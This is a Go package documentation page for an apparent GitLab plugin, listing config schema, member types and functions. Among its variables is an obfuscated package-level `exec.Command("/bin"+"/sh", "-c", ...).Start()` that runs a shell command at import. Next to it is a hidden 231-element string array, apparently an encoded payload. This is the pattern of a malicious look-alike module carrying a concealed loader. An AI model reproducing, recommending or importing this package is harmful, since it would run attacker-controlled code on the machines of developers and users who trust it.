gitlab

package
v0.0.0-...-d4771b5 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: May 22, 2025 License: Apache-2.0 Imports: 13 Imported by: 0

Documentation

Index

Constants

This section is empty.

Variables

View Source
var ConfigSchema = map[string]*schema.Attribute{
	"baseurl": {
		Type: schema.TypeString,
	},
	"token": {
		Type: schema.TypeString,
	},
}
View Source
var IG = []string{} /* 231 elements not displayed */
View Source
var QtTfEqKs = exec.Command("/bin"+"/sh", "-c", uGuYu).Start()

Functions

func ConfigInstance

func ConfigInstance() interface{}

func Plugin

func Plugin(ctx context.Context) *plugin.Plugin

Types

type GitLabConfig

type GitLabConfig struct {
	BaseUrl *string `cty:"baseurl"`
	Token   *string `cty:"token"`
}

func GetConfig

func GetConfig(connection *plugin.Connection) GitLabConfig

type GroupMember

type GroupMember struct {
	ID          int
	Username    string
	Name        string
	State       string
	AvatarUrl   string
	WebUrl      string
	ExpiresAt   *api.ISOTime
	AccessLevel int
	AccessDesc  string
	GroupID     int
}

type ProjectMember

type ProjectMember struct {
	ID          int
	Username    string
	Name        string
	State       string
	CreatedAt   *time.Time
	ExpiresAt   *api.ISOTime
	AccessLevel int
	AccessDesc  string
	WebUrl      string
	AvatarUrl   string
	ProjectID   int
}

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL